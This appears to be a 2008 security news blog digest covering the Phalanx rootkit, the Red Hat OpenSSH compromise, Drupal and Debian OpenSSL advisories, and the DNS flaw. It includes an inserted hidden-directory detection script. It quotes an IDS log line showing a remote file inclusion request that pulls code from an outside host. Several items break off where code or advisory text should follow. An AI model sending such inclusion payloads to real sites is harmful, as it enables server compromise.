On September 1, OSSEC announced the release of the latest version of the OSSEC-HIDS tool (version 1.6). This release includes many notable new features including:
For a full list of upgrades and enhancements, check out the change log. OSSEC can be downloaded from http://www.ossec.net/main/downloads.
So this story has been floating around for a while, but if you haven't heard already, several Red Hat servers, including some used for Fedora, were compromised in the last couple of weeks. Details were slow to emerge, but Red Hat has finally confirmed that some OpenSSH packages for Red Hat Enterprise Linux (RHEL) 4 and 5 could have been compromised. Full details, including how to detect bad packages and updates, can be found at http://www.redhat.com/security/data/openssh-blacklist.html. The full Red Hat advisory can be found at https://rhn.redhat.com/errata/RHSA-2008-0855.html.
The CERT for Germany's National Research and Education Network (DFN-CERT – Deutsches Forschungsnetz) is warning of a new spate of attacks using a variant of the Phalanx Linux rootkit. Once installed, this rootkit harvests SSH keys and other credentials which an attacker can use to access other victims. Fortunately the rootkit seems fairly easy to detect if you know what to look for. The rootkit creates a hidden directory, /etc/khubd.p2/, that is used to collect information. This directory is hidden, and the rootkit uses methods to hide its running processes and other telltale signs of its existence. Sometimes the name of the hidden directory is changed, but if you try to 'cd' into the directory and it appears not to exist, you can try creating the directory and doing an 'ls': a directory that cannot be created because it already exists, yet never shows up in a listing, is being hidden from you.
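The check described above, written out as an added POSIX shell script that is not part of the original post or of DFN-CERT's advisory. It assumes only sh, mkdir, rmdir, ls and grep; the /etc/khubd.p2 path is the one named in the report, and probing it requires root because mkdir under /etc is otherwise refused.

```shell
#!/bin/sh
# Classify a path the way the Phalanx write-up suggests: look for it, and
# if it seems absent, try to create it. Output is one word:
#   visible  - stat sees it and it appears in its parent's 'ls -a' listing
#   unlisted - stat sees it but 'ls -a' of the parent omits it
#   absent   - it really did not exist (we created it and removed it again)
#   hidden   - stat denies it exists, yet mkdir fails with "File exists"
#   error    - mkdir failed for another reason (e.g. not root under /etc)
probe_hidden_dir() {
    d=$1
    parent=$(dirname "$d")
    name=$(basename "$d")
    if [ -e "$d" ]; then
        if ls -a "$parent" | grep -qxF -- "$name"; then
            echo visible
        else
            echo unlisted
        fi
        return 0
    fi
    # The if-form keeps a failing mkdir from tripping 'set -e'.
    if err=$(mkdir "$d" 2>&1); then
        rmdir "$d"            # leave the system as we found it
        echo absent
        return 0
    fi
    case $err in
        *xist*) echo hidden ;;   # EEXIST on a name stat could not see
        *)      echo error ;;
    esac
}

# Probe every path given on the command line, e.g. the name from the
# DFN-CERT report (run as root so that mkdir under /etc is permitted):
#   sh probe_hidden_dir.sh /etc/khubd.p2
for d in "$@"; do
    printf '%s: %s\n' "$d" "$(probe_hidden_dir "$d")"
done
```

Because the rootkit may rename the directory, the script takes any number of paths, so you can probe a list of suspicious names in one run.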
This was an interesting one: I just ran across this alert from my IDS:
66.216.91.89 - - [30/Jul/2008:04:32:54 -0400] "GET /node//e404.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 4252
It seems someone is trying to read in an arbitrary file as part of a script execution. Tracking down the file, I found it contained the following code:
Most people are probably blissfully unaware, but security researcher Dan Kaminsky discovered a very serious flaw in DNS (Domain Name System) and was waiting until Black Hat to release the details. Well, as with all secrets, if more than one person knows it, soon it's not a secret. The vulnerability was announced two weeks ago by US CERT and major vendors have been working to apply patches. However, most of the public was unaware of how the vulnerability would affect them, or how an exploit would work.
The Drupal team released a critical announcement today advising that all users update their Drupal 5.x and 6.x installations. Several vulnerabilities exist within the Drupal core that could be used by remote attackers to exploit cross-site scripting (XSS), session fixation and SQL injection vulnerabilities. Because it doesn't take attackers long to reverse engineer exploit code after a patch is released (see http://www.madirish.net/?article=212), it is important to upgrade your Drupal installation as soon as possible.
The full text of the announcement follows and can also be found at http://drupal.org/node/280571:
------------SA-2008-044 - DRUPAL CORE - MULTIPLE VULNERABILITIES------------
* Advisory ID: DRUPAL-SA-2008-044
* Project: Drupal core
* Version: 5.x, 6.x
* Date: 2008-July-9
* Security risk: Moderately critical
* Exploitable from: Remote
* Vulnerability: Multiple vulnerabilities
------------DESCRIPTION------------
Security Focus is reporting that a new, as yet unpatched, exploit targeting Adobe Flash is circulating. Apparently a Chinese malware package (the MPack exploit kit) now includes attacks against Flash. The troubling thing about the report is that there are few details, and the software in question cannot yet be patched to prevent exploitation (a so-called zero day, or 0day).
It seems Debian has introduced a critical flaw into the OpenSSL implementation that could allow an attacker to listen in on an encrypted web session or even an SSH session. What's worse is that even after an upgrade, old keys will still contain this vulnerability. This means that Debian (and Debian-based systems, like Ubuntu) will have to patch/upgrade their systems and then regenerate all of their encryption keys. The Debian announcement can be found at Debian.org and the Ubuntu advisory can be found at Ubuntu.com. Update your systems as soon as you can!
Update:
It looks like code has been released into the wild to brute-force SSH keys and gain unauthorized access to servers running the bad OpenSSL code (with OpenSSH and key authorization enabled):